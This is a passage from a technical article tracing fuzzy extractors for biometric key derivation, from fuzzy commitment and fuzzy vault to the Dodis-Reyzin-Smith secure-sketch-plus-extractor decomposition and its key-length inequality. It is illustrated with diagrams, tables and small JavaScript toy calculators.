&lt;p&gt;Two foundational tools were already in the cryptographic toolkit and would later become load-bearing pieces of the fuzzy extractor. The first was the 1979 Carter-Wegman construction of &lt;em&gt;universal hash functions&lt;/em&gt;: a family ${h_s}$ such that for any two distinct inputs $x \ne y$, $\Pr_s[h_s(x) = h_s(y)] \le 1/|\text{range}|$ [@carter-wegman-1979]. The second was the 1989 Impagliazzo-Levin-Luby Leftover Hash Lemma (LHL), which proved that applying a randomly chosen universal hash to any min-entropy source yields an output statistically indistinguishable from uniform, up to a precise entropy budget [@ill-1989]. Together, these two results were a randomness-extraction toolkit waiting for an application.Carter-Wegman 1979 is the deepest ancestor of every information-theoretic fuzzy extractor. The strong extractor at the heart of the Dodis-Reyzin-Smith construction is, mechanically, a Carter-Wegman universal hash with a random seed -- the LHL is what proves its output is uniform.&lt;/p&gt;

The min-entropy of a random variable $W$ is $H_\infty(W) = -\log_2 \max_w \Pr[W = w]$. It is the entropy measure that captures *worst-case* guessing difficulty: a source with $m$ bits of min-entropy cannot be guessed correctly with probability greater than $2^{-m}$ in one try. Min-entropy is the right measure for cryptographic key derivation because Shannon entropy is too generous when the distribution is peaked [@dors-2008-siamjc].
&lt;p&gt;In May 1998, at the IEEE Symposium on Security and Privacy, Davida, Frankel, and Matt published the first formal-cryptographic proposal for binding a private signing key to a biometric. Their scheme used majority-decoding with a BCH error-correcting code to absorb the noise in repeated iris readings, then used the corrected reading to release a stored long-lived signing key [@davida-frankel-matt-1998], [@dblp-davida-frankel-matt-1998]. The construction worked, in the sense that it ran end-to-end on test data. But the paper had no notion of a &lt;em&gt;strong extractor&lt;/em&gt;, no parameter inequality bounding the extractable key length, and no security theorem against a generic adversary. The reader was asked to trust the construction by inspection.&lt;/p&gt;
&lt;p&gt;That same period saw the rise of a completely different approach. In 2001, Ratha, Connell, and Bolle of IBM proposed &lt;em&gt;cancelable biometrics&lt;/em&gt;: instead of trying to derive a cryptographic key from the biometric, apply a non-invertible application-specific transformation $T_i$ to the feature vector before storage, so that a compromised template can be revoked and re-issued under a fresh $T_j$ [@ratha-connell-bolle-2001]. The goal was &lt;em&gt;template protection&lt;/em&gt;, not key derivation.&lt;/p&gt;
&lt;p&gt;The three properties Ratha et al. demanded of $T_i$ -- &lt;em&gt;irreversibility&lt;/em&gt; (the transform cannot be inverted to recover the original feature vector), &lt;em&gt;unlinkability&lt;/em&gt; (two transforms of the same biometric cannot be matched), and &lt;em&gt;renewability&lt;/em&gt; (a compromised transform can be replaced) -- would two decades later be codified verbatim by ISO/IEC 24745:2022 as the universal properties of any biometric template protection scheme [@iso-iec-24745-2022], [@rathgeb-uhl-2011]. Cancelable biometrics partitions the design space alongside fuzzy extractors: the former &lt;em&gt;transforms&lt;/em&gt; a biometric template, the latter &lt;em&gt;derives&lt;/em&gt; a cryptographic key from it.&lt;/p&gt;
&lt;p&gt;Davida, Frankel, and Matt had shipped a working construction without a unifying primitive. Juels and Wattenberg, within twelve months, would publish a cleaner construction with the same gap; and within seven years Dodis, Reyzin, and Smith would close it. The next section is the story of those precursors, and the structural defect they share.&lt;/p&gt;
&lt;h2&gt;3. Early approaches: fuzzy commitment and fuzzy vault&lt;/h2&gt;
&lt;p&gt;Two precursor constructions, six years apart, get most of the way to a fuzzy extractor without naming the primitive. They are simultaneously the foundation everything later builds on and the ad-hoc constructions the 2004 Dodis-Reyzin-Smith paper would retroactively classify as &lt;em&gt;components&lt;/em&gt; of a real abstraction rather than a complete one.&lt;/p&gt;
&lt;h3&gt;3.1 Juels-Wattenberg 1999: fuzzy commitment&lt;/h3&gt;
&lt;p&gt;Ari Juels and Martin Wattenberg, at the 1999 ACM Conference on Computer and Communications Security, introduced the &lt;strong&gt;fuzzy commitment scheme&lt;/strong&gt; [@juels-wattenberg-1999-pdf]. The construction is short enough to write on a napkin. Fix a binary error-correcting code $\mathcal{C} \subseteq {0,1}^n$ that corrects up to $t$ errors. To commit to a noisy biometric reading $w \in {0,1}^n$:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Pick a random codeword $c \stackrel{R}{\leftarrow} \mathcal{C}$.&lt;/li&gt;
&lt;li&gt;Publish the commitment blob $(h(c), \delta)$ where $\delta := w \oplus c$ and $h$ is a cryptographic hash.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To decommit with a fresh reading $w&apos;$ within Hamming distance $t$ of $w$, compute $c&apos; := D(w&apos; \oplus \delta)$ where $D$ is the code&apos;s decoder; check $h(c&apos;) \stackrel{?}{=} h(c)$. If the check passes, the commitment opens. The argument that the scheme is &lt;em&gt;binding&lt;/em&gt; (the committer cannot later open to a different value) and &lt;em&gt;hiding&lt;/em&gt; (the commitment leaks nothing about $w$) goes through in the random-oracle model.&lt;/p&gt;

sequenceDiagram
    participant U as User (commit)
    participant S as Storage
    participant V as Verifier (decommit)
    U-&amp;gt;&amp;gt;U: Pick random codeword c
    U-&amp;gt;&amp;gt;U: Compute delta = w XOR c
    U-&amp;gt;&amp;gt;U: Compute t = hash(c)
    U-&amp;gt;&amp;gt;S: Publish (t, delta)
    Note over V: Time passes, user re-scans
    V-&amp;gt;&amp;gt;S: Fetch (t, delta)
    V-&amp;gt;&amp;gt;V: Read fresh w&apos; near w
    V-&amp;gt;&amp;gt;V: Compute c&apos; = Decode(w&apos; XOR delta)
    V-&amp;gt;&amp;gt;V: Check hash(c&apos;) == t
    V--&amp;gt;&amp;gt;V: Open commitment to c
&lt;p&gt;Fuzzy commitment is elegant, but it has three structural gaps that DRS 2004 will later expose.&lt;/p&gt;
&lt;p&gt;First, the construction is a &lt;em&gt;commitment&lt;/em&gt;, not an &lt;em&gt;extractor&lt;/em&gt;: it binds a hash of a codeword, not a uniformly random key, and it cannot be plugged directly into a key-derivation pipeline. Second, it assumes Hamming-distance noise, which fits iris codes (Daugman&apos;s IrisCodes are fixed-length bitstrings whose pairwise distance is fractional binomial) but does not fit fingerprint minutiae sets or face embeddings. Third, and most damagingly, the construction leaks under correlated re-enrolment. In 2009, Simoens, Tuyls, and Preneel demonstrated &quot;how to link and reverse protected templates produced by code-offset and bit-permutation sketches&quot; [@simoens-tuyls-preneel-2009]; if a user enrols twice with two slightly different readings $w_1, w_2$ of the same finger, the helper pair $(\delta_1, \delta_2)$ leaks $w_1 \oplus w_2$, which is closer to zero than uniform and reveals the noise distribution.&lt;/p&gt;
&lt;h3&gt;3.2 Juels-Sudan 2002 / 2006: fuzzy vault&lt;/h3&gt;
&lt;p&gt;Three years later, Ari Juels and Madhu Sudan extended the same idea to &lt;em&gt;unordered sets&lt;/em&gt;, the natural metric for fingerprint minutiae [@juels-sudan-2002-pdf], [@juels-sudan-2006-dcc]. The &lt;strong&gt;fuzzy vault&lt;/strong&gt; locks a secret $\kappa$ in a vault as follows:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Encode $\kappa$ as the coefficients of a polynomial $p$ of degree $k$ over a finite field.&lt;/li&gt;
&lt;li&gt;For each element $a_i$ of the genuine biometric set $A$, publish the point $(a_i, p(a_i))$.&lt;/li&gt;
&lt;li&gt;Add many &lt;em&gt;chaff points&lt;/em&gt; $(x_j, y_j)$ with $y_j \ne p(x_j)$ to drown the genuine points in noise.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;A user whose set $B$ overlaps sufficiently with $A$ identifies enough true points to Reed-Solomon-decode $p$, recovers $\kappa$, and unlocks the vault. The construction handles set-difference noise naturally and was widely deployed in fingerprint authentication research between 2002 and 2010.Watch the citation. The conference version is IEEE ISIT 2002 (single-page proceedings extended abstract; full author PDF is the canonical text). The journal version is &lt;em&gt;Designs, Codes and Cryptography&lt;/em&gt; 38(2):237-257, February 2006 -- not IEEE Transactions on Information Theory as one widely-circulated secondary source claims.&lt;/p&gt;
&lt;p&gt;But the fuzzy vault inherits and amplifies the precursor&apos;s defects. Walter Scheirer and Terrance Boult, in 2007, enumerated three concrete attacks: &lt;em&gt;Attack via Record Multiplicity&lt;/em&gt; (ARM), &lt;em&gt;Surreptitious Key Inversion&lt;/em&gt; (SKI), and &lt;em&gt;Blended Substitution&lt;/em&gt; [@scheirer-boult-2007]. The Attack via Record Multiplicity exploits exactly the same correlated-re-enrolment weakness fuzzy commitment has: two vaults locking the same biometric under different polynomials reveal the underlying set $A$ by intersecting the published points. The Scheirer-Boult paper opens with a sentence that is, in retrospect, the diagnosis of the entire pre-DRS literature: &quot;while many PETs for biometrics have attempted a formal analysis of their security, a significant oversight has been the issue of the risk from attacks that use multiple records&quot; [@scheirer-boult-2007].&lt;/p&gt;
&lt;h3&gt;3.3 The structural defect both constructions share&lt;/h3&gt;
&lt;p&gt;Stand back. Both constructions handle noise tolerance via an error-correcting code, and both produce a security argument by hashing or hiding the result. Neither construction separates these two responsibilities. The noise-tolerance layer (the code) and the uniformity layer (the hash) are entangled in the same blob of public data. That entanglement is structurally why neither can prove a generic security theorem against a generic adversary: every security argument is tied to specific assumptions about the source distribution, the code, and the random oracle, and slight changes to any of them break the analysis. The fix is not a better code or a better hash. The fix has a name: &lt;em&gt;decomposition&lt;/em&gt;.&lt;/p&gt;

A pair of algorithms $(\text{SS}, \text{Rec})$ such that $\text{SS}(w) \to s$ produces a public sketch $s$, and $\text{Rec}(w&apos;, s) \to w$ recovers the original $w$ for any $w&apos;$ within distance $t$ of $w$. The sketch is allowed to leak some information about $w$, but the residual *average min-entropy* $\tilde H_\infty(W \mid \text{SS}(W))$ must remain at least some target $\tilde m$ [@dors-2008-siamjc].
&lt;p&gt;That word -- decomposition -- is what Dodis, Reyzin, and Smith would deliver, on Thursday May 6, 2004, in Interlaken, Switzerland, at EUROCRYPT.&lt;/p&gt;
&lt;h2&gt;4. Evolution: five generations at a glance&lt;/h2&gt;
&lt;p&gt;Before walking through the DRS 2004 decomposition in detail, it helps to see where it sits in the family tree. Every construction the rest of this article mentions belongs to one of five generations, ordered by what failure of the previous generation it closes.&lt;/p&gt;

flowchart LR
    G0[&quot;Gen 0&lt;br /&gt;hash(w)&lt;br /&gt;fails on noise&quot;] --&amp;gt; G1[&quot;Gen 1&lt;br /&gt;Juels-Wattenberg 1999&lt;br /&gt;fuzzy commitment&quot;]
    G1 --&amp;gt; G15[&quot;Gen 1.5&lt;br /&gt;Juels-Sudan 2002/2006&lt;br /&gt;fuzzy vault&quot;]
    G15 --&amp;gt; G2[&quot;Gen 2&lt;br /&gt;Dodis-Reyzin-Smith 2004&lt;br /&gt;fuzzy extractor&quot;]
    G2 --&amp;gt; G3a[&quot;Gen 3a&lt;br /&gt;Boyen 2004&lt;br /&gt;reusable&quot;]
    G2 --&amp;gt; G3b[&quot;Gen 3b&lt;br /&gt;BDKOS 2005 / DKKRS 2012&lt;br /&gt;tamper-resilient&quot;]
    G2 --&amp;gt; G4[&quot;Gen 4&lt;br /&gt;Fuller-Meng-Reyzin 2013&lt;br /&gt;computational, LWE-based&quot;]
    G2 --&amp;gt; G5[&quot;Gen 5&lt;br /&gt;CFPRS 2016&lt;br /&gt;reusable low-entropy&quot;]
&lt;p&gt;The table below names each generation, its central insight, and the new failure mode it exposes that motivates the next generation. Read it top to bottom; each row solves a problem the row above raised.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gen&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Authors / venue&lt;/th&gt;
&lt;th&gt;Central insight&lt;/th&gt;
&lt;th&gt;New failure exposed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;folk&lt;/td&gt;
&lt;td&gt;$\text{key} = h(w)$&lt;/td&gt;
&lt;td&gt;Avalanche destroys key on every re-scan&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;1999&lt;/td&gt;
&lt;td&gt;Juels-Wattenberg, CCS [@juels-wattenberg-1999-pdf]&lt;/td&gt;
&lt;td&gt;Code-offset: hide $w$ inside $\delta = w \oplus c$ for random codeword $c$&lt;/td&gt;
&lt;td&gt;Hamming-only; no extractor; leaks under re-enrol&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.5&lt;/td&gt;
&lt;td&gt;2002 / 2006&lt;/td&gt;
&lt;td&gt;Juels-Sudan, ISIT / DCC [@juels-sudan-2002-pdf], [@juels-sudan-2006-dcc]&lt;/td&gt;
&lt;td&gt;Polynomial-on-set with chaff points; handles set-difference&lt;/td&gt;
&lt;td&gt;Vulnerable to record-multiplicity and key-inversion attacks [@scheirer-boult-2007]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2004 / 2008&lt;/td&gt;
&lt;td&gt;Dodis-Reyzin-Smith, EUROCRYPT / SIAM JC [@drs-2004-eurocrypt], [@dors-2008-siamjc]&lt;/td&gt;
&lt;td&gt;Decomposition: secure sketch + strong extractor; one inequality&lt;/td&gt;
&lt;td&gt;Forbids construction at consumer biometric entropy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3a&lt;/td&gt;
&lt;td&gt;2004&lt;/td&gt;
&lt;td&gt;Boyen, CCS [@boyen-2004-ccs-eprint]&lt;/td&gt;
&lt;td&gt;Reusable fuzzy extractors; chosen-perturbation security&lt;/td&gt;
&lt;td&gt;Outsider model needs XOR-homomorphic sketch; insider model needs RO&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3b&lt;/td&gt;
&lt;td&gt;2005 / 2012&lt;/td&gt;
&lt;td&gt;Boyen-Dodis-Katz-Ostrovsky-Smith, EUROCRYPT [@bdkos-2005-eurocrypt]; DKKRS, IEEE TIT [@dkkrs-2012-ieeetit]&lt;/td&gt;
&lt;td&gt;Tamper-resilient fuzzy extractors; helper-data integrity against active adversary&lt;/td&gt;
&lt;td&gt;Active-adversary lower bound: $\Omega(\log(1/\varepsilon))$ extra entropy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;2013 / 2020&lt;/td&gt;
&lt;td&gt;Fuller-Meng-Reyzin, ASIACRYPT / I&amp;amp;C [@fmr-2013-asiacrypt-eprint], [@fmr-2020-iandc]&lt;/td&gt;
&lt;td&gt;Skip the sketch; LWE-based computational construction extracts key length equal to source min-entropy&lt;/td&gt;
&lt;td&gt;Negative result: every computational HILL secure sketch still implies an ECC with $2^{m-2}$ codewords&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;2016&lt;/td&gt;
&lt;td&gt;Canetti-Fuller-Paneth-Reyzin-Smith, EUROCRYPT [@cfprs-2016-eurocrypt]&lt;/td&gt;
&lt;td&gt;Per-bit digital lockers; sample-then-extract; reusable for low-entropy sources&lt;/td&gt;
&lt;td&gt;Depends on digital-locker idealisation; restricted source class&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Read this way, the family tree tells a story. Each successor generation closes a real defect: Boyen 2004 closes the multi-enrolment leak that Simoens-Tuyls-Preneel would later make concrete; BDKOS 2005 closes the helper-data tampering problem; FMR 2013 attacks the min-entropy floor itself by trading information-theoretic security for an LWE assumption; CFPRS 2016 chases the low-entropy regime where every prior generation gave up. None of them dethrones the foundational decomposition. They all live inside the framework DRS established.Watch two attribution traps. Boyen 2004 is a sole-author paper -- &quot;Reusable Cryptographic Fuzzy Extractors&quot; by Xavier Boyen [@boyen-2004-ccs-eprint], not &quot;Boyen and Reyzin&quot; or &quot;Boyen et al.&quot; And Fuller-Meng-Reyzin 2013 appeared at &lt;em&gt;ASIACRYPT&lt;/em&gt; 2013, not EUROCRYPT 2013; the misattribution is widespread in secondary sources [@fmr-2013-asiacrypt-eprint].&lt;/p&gt;
&lt;p&gt;Generation 2 is the load-bearing entry. Every later claim about what a fuzzy extractor can and cannot do traces back to it. The next section walks through the construction in mechanical detail, because the inequality at its centre is the artefact every later section will reference.&lt;/p&gt;
&lt;h2&gt;5. The breakthrough: Dodis-Reyzin-Smith 2004 in detail&lt;/h2&gt;
&lt;p&gt;May 6, 2004. Interlaken, Switzerland. Session 16 (&quot;New Applications&quot;). Yevgeniy Dodis (NYU), Leonid Reyzin (Boston University), and Adam Smith (then MIT) present a paper that will be widely cited as the foundational work of the area [@drs-2004-eurocrypt]. The journal version, published in 2008 in &lt;em&gt;SIAM Journal on Computing&lt;/em&gt; with Rafail Ostrovsky added as a fourth author, is the canonical reference text for every formal definition the field uses [@dors-2008-siamjc].The conference paper is three-author Dodis-Reyzin-Smith; the 2008 SIAM Journal on Computing version is four-author and adds Ostrovsky. Cite whichever fits your context, but get the author count right.&lt;/p&gt;
&lt;p&gt;The paper&apos;s contribution is not a new algorithm. It is a &lt;em&gt;decomposition&lt;/em&gt; and a &lt;em&gt;security inequality&lt;/em&gt;. The two halves of the decomposition are the secure sketch and the strong randomness extractor, and the inequality bounds the extractable key length in terms of source min-entropy, code redundancy, and security parameter.&lt;/p&gt;
&lt;h3&gt;5.1 The secure sketch: information reconciliation&lt;/h3&gt;
&lt;p&gt;A secure sketch is the noise-tolerance layer. Formally, an $(\mathcal{M}, m, \tilde m, t)$-secure sketch is a pair of functions $(\text{SS}, \text{Rec})$ over a metric space $(\mathcal{M}, \text{dis})$ such that, for any $w, w&apos;$ with $\text{dis}(w, w&apos;) \le t$, $\text{Rec}(w&apos;, \text{SS}(w)) = w$, and for any source $W$ with min-entropy $H_\infty(W) \ge m$, the &lt;em&gt;average min-entropy&lt;/em&gt; $\tilde H_\infty(W \mid \text{SS}(W)) \ge \tilde m$ [@dors-2008-siamjc].&lt;/p&gt;

Average min-entropy, also called conditional min-entropy, generalises min-entropy to the case where partial information $Y$ about $W$ is public. Formally, $\tilde H_\infty(W \mid Y) = -\log_2 \mathbb{E}_{y \leftarrow Y}\!\left[\max_w \Pr[W = w \mid Y = y]\right]$. It is the right entropy measure for sketches because the sketch $\text{SS}(W)$ is public and an adversary&apos;s best guess of $W$ averages over the possible sketch values [@dors-2008-siamjc].
&lt;p&gt;Two canonical sketch constructions matter. The &lt;strong&gt;code-offset sketch&lt;/strong&gt; picks a random codeword $c$ from an $[n, k, 2t+1]$ binary error-correcting code and publishes $s = w \oplus c$. To recover, compute $c&apos; = D(w&apos; \oplus s)$ where $D$ is the code&apos;s decoder; then return $w = s \oplus c&apos;$. The entropy loss is at most $n - k$ bits. The &lt;strong&gt;syndrome sketch&lt;/strong&gt; publishes $s = H \cdot w^T$ where $H$ is the parity-check matrix of the same code; recovery solves a coset-leader problem. The entropy loss is identical; the syndrome variant just publishes a shorter helper. PinSketch, the canonical sketch for &lt;em&gt;set-difference&lt;/em&gt; metrics, lives in section 6 of the journal paper [@dors-2008-siamjc].&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Simulate a tiny [16, 11, 3] code: 11 data bits, 5 parity bits via a fixed generator. // Real code-offset uses BCH/Reed-Solomon; this is a toy that shows the structure. function parity(w, mask) { let p = 0; for (let i = 0; i &amp;lt; 16; i++) if ((mask&amp;gt;&amp;gt;i)&amp;amp;1) p ^= (w&amp;gt;&amp;gt;i)&amp;amp;1; return p; } const masks = [0b1111111111100000, 0b1111110000011110, 0b1111000011111101, 0b1100111111111011, 0b0011111111110111]; function encode(data11) {   let cw = data11 &amp;amp; 0x7FF;   for (let i = 0; i &amp;lt; 5; i++) cw |= parity(data11, masks[i]) &amp;lt;&amp;lt; (11 + i);   return cw; } // Sketch: pick a random codeword c, publish s = w XOR c const w = 0b0110110010110101; // imagine this is the user&apos;s first reading const data = Math.floor(Math.random() * 2048); const c = encode(data); const s = w ^ c; console.log(&apos;First reading w =&apos;, w.toString(2).padStart(16,&apos;0&apos;)); console.log(&apos;Random codeword c =&apos;, c.toString(2).padStart(16,&apos;0&apos;)); console.log(&apos;Public sketch s = w XOR c =&apos;, s.toString(2).padStart(16,&apos;0&apos;)); // Re-scan: the user reads w&apos; with one bit flipped const wp = w ^ (1 &amp;lt;&amp;lt; 7); console.log(&apos;Re-scan reading w\\&apos; =&apos;, wp.toString(2).padStart(16,&apos;0&apos;)); const cp = wp ^ s; console.log(&apos;Decoder input c + e =&apos;, cp.toString(2).padStart(16,&apos;0&apos;)); console.log(&apos;The decoder sees the noisy codeword and corrects it back to c -- so Rec recovers w from w\\&apos; and s.&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;h3&gt;5.2 The strong randomness extractor: from sketch-residual to uniform key&lt;/h3&gt;
&lt;p&gt;A strong randomness extractor is the uniformity layer. The relevant formal statement is the average-case form of the &lt;strong&gt;Leftover Hash Lemma&lt;/strong&gt;.&lt;/p&gt;

A function $\text{Ext}: \{0,1\}^n \times \{0,1\}^d \to \{0,1\}^\ell$ is an *average-case* $(n, \tilde m, \ell, \varepsilon)$-strong extractor if, for every joint distribution $(W, I)$ over $\{0,1\}^n \times \{0,1\}^*$ with $\tilde H_\infty(W \mid I) \ge \tilde m$, the statistical distance $\text{SD}((\text{Ext}(W; S), S, I), (U_\ell, S, I)) \le \varepsilon$ where $S$ is the (public) extractor seed and $U_\ell$ is uniform [@dors-2008-siamjc].

Let $H$ be a universal hash family with output length $\ell$. For any source $W$ with $\tilde H_\infty(W \mid I) \ge \tilde m$, the distribution $(S, H_S(W), I)$ is $\varepsilon$-close in statistical distance to $(S, U_\ell, I)$ whenever $\ell \le \tilde m - 2 \log(1/\varepsilon) + 2$ [@ill-1989], [@dors-2008-siamjc]. The Leftover Hash Lemma is therefore the single inequality that powers every information-theoretic strong extractor used in practice.
&lt;p&gt;The LHL says: take any min-entropy source, hash it with a randomly chosen universal hash, and what comes out is statistically indistinguishable from uniform, up to a precise budget. Pay $2 \log(1/\varepsilon) - 2$ bits of entropy at the door; everything left over is uniform.&lt;/p&gt;
&lt;h3&gt;5.3 Composition&lt;/h3&gt;
&lt;p&gt;The composition is the whole point. Define $\text{Gen}(w) := (R, P)$ where $P = (\text{SS}(w), \text{seed})$ and $R = \text{Ext}(w; \text{seed})$. To recover, $\text{Rep}(w&apos;, P)$ runs $w = \text{Rec}(w&apos;, \text{SS}(w))$ and recomputes $R = \text{Ext}(w; \text{seed})$. The composition is an $(\mathcal{M}, m, \ell, t, \varepsilon)$-fuzzy extractor, and the security proof is now algebraic.&lt;/p&gt;

The helper data $P$ in a fuzzy extractor is the public part of the output of $\text{Gen}$. It consists of the secure sketch $\text{SS}(w)$ plus the extractor seed. It must be available at recovery time, but it need not be secret. The security guarantee says that even an adversary who sees $P$ in full learns at most $\varepsilon$ bits about the extracted key $R$ in statistical distance [@dors-2008-siamjc].

flowchart TD
    W[&quot;Noisy reading w&quot;] --&amp;gt; SS[&quot;Secure sketch SS&quot;]
    W --&amp;gt; EXT[&quot;Strong extractor Ext&quot;]
    SEED[&quot;Random seed&quot;] --&amp;gt; EXT
    SS --&amp;gt; P[&quot;Public helper P = (sketch, seed)&quot;]
    SEED --&amp;gt; P
    EXT --&amp;gt; R[&quot;Uniform key R&quot;]
    P --&amp;gt; REP[&quot;Rep at recovery&quot;]
    WP[&quot;Noisy reading w&apos;&lt;br /&gt;(within distance t)&quot;] --&amp;gt; REP
    REP --&amp;gt; R2[&quot;Same uniform key R&quot;]
&lt;h3&gt;5.4 The load-bearing inequality&lt;/h3&gt;
&lt;p&gt;Compose the two entropy budgets. The sketch starts with $H_\infty(W) \ge m$ bits of min-entropy and leaks at most $n - k$ to its public sketch; what remains is $\tilde H_\infty(W \mid \text{SS}(W)) \ge m - (n - k)$. Feed that residual into the LHL with security parameter $\varepsilon$, and the extractor delivers a uniform key of lengthThe constant $+2$ at the end of the inequality is an artefact of how DORS 2008 states the average-case Leftover Hash Lemma in Lemma 2.4; the conference paper writes it as $-O(1)$.&lt;/p&gt;

$$\ell \;\le\; H_\infty(W) - (n - k) - 2\log(1/\varepsilon) + 2.$$
&lt;p&gt;This inequality is the artefact every later section will reference. Walk it term by term. The first term is the source min-entropy: the actual information content of the biometric. The second term is the code redundancy: the entropy paid to absorb noise. The third term is the security parameter cost: every halving of the adversary&apos;s distinguishing advantage costs two bits. The final $+2$ is a small constant.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;function extractableKeyLen(m, codeRedundancy, epsilon) {   const securityCost = 2 * Math.log2(1 / epsilon);   return m - codeRedundancy - securityCost + 2; } // Iris source (Daugman 2003: ~249 dof = effective bits), 128-bit security, BCH [255,131,37] console.log(&apos;iris @ eps=2^-80:&apos;, extractableKeyLen(249, 124, 2 ** -80).toFixed(1), &apos;bits&apos;); // Fingerprint at the upper end of Pankanti-Prabhakar-Jain 2002 (~70 effective bits) console.log(&apos;fingerprint @ eps=2^-80:&apos;, extractableKeyLen(70, 124, 2 ** -80).toFixed(1), &apos;bits&apos;); // Face embedding under correlated illumination noise (~30-50 effective bits) console.log(&apos;face @ eps=2^-80:&apos;, extractableKeyLen(40, 124, 2 ** -80).toFixed(1), &apos;bits&apos;); // Loosen security to eps=2^-40 and see if fingerprint recovers console.log(&apos;fingerprint @ eps=2^-40:&apos;, extractableKeyLen(70, 124, 2 ** -40).toFixed(1), &apos;bits&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Run that calculator on realistic numbers. At a security parameter of $\varepsilon = 2^{-80}$, the third term alone eats 160 bits. A standard $[255, 131, 37]$ BCH code (which corrects up to 18 errors in 255 bits) burns another 124 bits. To extract a 128-bit AES key, the source must supply at least 410 bits of min-entropy.&lt;/p&gt;

Set $m = 70$ (fingerprint upper bound per Pankanti et al. 2002), $n - k = 124$ (BCH redundancy), and $\varepsilon = 2^{-80}$. The extractable key length becomes $70 - 124 - 160 + 2 = -212$ bits. A negative bound means the construction is not slow or expensive: it is *infeasible* at any parameter setting. Try loosening security to $\varepsilon = 2^{-40}$: still $70 - 124 - 80 + 2 = -132$. Even pushing the security parameter all the way down to $\varepsilon = 2^{-10}$ (laughably weak by OS-authenticator standards) leaves you at \$70 - 124 - 20 + 2 = -72$ bits. The fingerprint source simply does not have the entropy budget for the construction at any meaningful security level.
&lt;p&gt;The iris, at Daugman&apos;s 249 statistical degrees of freedom [@daugman-2003-pdf], [@daugman-2004-csvt], is just barely enough -- and only because Hao, Anderson, and Daugman engineered a careful two-layer Hadamard-then-Reed-Solomon code that exploits the block structure of iris noise to achieve a high error-correction rate per information bit, sufficient to extract 140 bits from the 2048-bit iris code at 99.5% recovery success [@hao-anderson-daugman-2005-tr]. The fingerprint, at 40 to ~70 effective bits per Pankanti, Prabhakar, and Jain [@pankanti-prabhakar-jain-2002], is not even close. The face embedding, at 30 to 50 raw bits and considerably less under correlated illumination and pose noise, is further still.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The DRS 2004 key-length inequality is the article&apos;s load-bearing artefact. Every later claim that a fuzzy extractor cannot work on consumer biometrics traces back to it. The construction is not slow or expensive on these sources -- it is &lt;em&gt;mathematically forbidden&lt;/em&gt;, in the sense that the extractable key length is negative at the security parameter an operating-system authenticator demands.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the inequality that forbids the construction on consumer-grade face or fingerprint at the security bar an operating system authenticator demands. The rest of the article is the four-generation effort to escape the forbidding, and the architectural choice every shipped consumer product made instead.&lt;/p&gt;
&lt;h2&gt;6. State of the art: by metric space and by successor generation&lt;/h2&gt;
&lt;p&gt;The DRS 2004 framework is parameterised by metric space and source class. To navigate the field, think of every fuzzy-extractor instantiation as a pair of choices: pick a sketch suited to the source&apos;s metric, then pick an extractor suited to the source&apos;s entropy profile. The state of the art is best read as a two-axis table.&lt;/p&gt;
&lt;h3&gt;6.1 Sketches by metric space&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric space&lt;/th&gt;
&lt;th&gt;Sketch construction&lt;/th&gt;
&lt;th&gt;Code or technique&lt;/th&gt;
&lt;th&gt;Where it fits&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Hamming distance&lt;/td&gt;
&lt;td&gt;Code-offset / syndrome [@dors-2008-siamjc]&lt;/td&gt;
&lt;td&gt;$[n,k,2t+1]$ BCH&lt;/td&gt;
&lt;td&gt;Iris codes; SRAM PUFs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Set difference&lt;/td&gt;
&lt;td&gt;PinSketch (DORS 2008 section 6) [@dors-2008-siamjc], [@reyzin-lab-home]&lt;/td&gt;
&lt;td&gt;Symmetric-difference syndrome decoding; sublinear in universe size&lt;/td&gt;
&lt;td&gt;Fingerprint minutiae sets; many-out-of-many tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Edit distance&lt;/td&gt;
&lt;td&gt;Embed into Hamming via low-distortion encoding&lt;/td&gt;
&lt;td&gt;Ostrovsky-Rabani-style embeddings&lt;/td&gt;
&lt;td&gt;DNA sequences, typed passwords&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Continuous (face / fingerprint embeddings)&lt;/td&gt;
&lt;td&gt;Quantise then Hamming&lt;/td&gt;
&lt;td&gt;Lloyd-Max or learned quantisers&lt;/td&gt;
&lt;td&gt;Face deep-features; the worst empirical entropy profile&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
